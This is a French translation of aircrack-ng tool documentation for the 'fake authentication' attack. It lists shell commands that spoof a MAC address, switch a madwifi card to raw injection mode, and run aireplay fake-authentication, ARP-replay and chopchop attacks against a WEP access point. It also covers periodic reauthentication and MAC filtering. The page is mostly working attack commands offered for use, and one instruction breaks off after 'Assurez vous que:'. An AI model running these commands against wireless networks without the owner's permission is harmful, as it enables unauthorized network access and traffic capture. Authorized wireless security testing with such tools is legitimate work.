Traduction française, original
Voir le tutorial
Documentation de aircrackAttaque 1: fake authentication
|
Avec madwifi CVS 2005-08-14 mis à jour, il est possible d'injecter des aquets en mode Managed (la clef wep elle meme importe peut tant que l'AP accepte les authetifications Open-System).
ifconfig ath0 down hw ether 00:11:22:33:44:55 iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA ifconfig ath0 up sysctl -w dev.ath0.rawdev=1 ifconfig ath0raw up airodump ath0raw out 6 Ensuite vous pouvez lancer les attaques 3 ou 4 (aireplay va remplacer automatiquement ath0 par ath0raw dans ce qui suit): aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0 aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0 |
Certains AP requièrent de s'associer toutes les 30 secondes, autrement le client est considéré comme déconnecté. Dans ce cas mettez en place une réauthentification periodique:
aireplay -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Si cette attaque semble mal se dérouler (aireplay ne s'arrete pas d'envoyer des requetes d'authentification), un filtrage d'adresse MAC doit être en place. Assurez vous que:
Rappel:L'injection sur Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell et Broadcom n'est pas supporté a cause des firmwares ou des limitations des pilotes.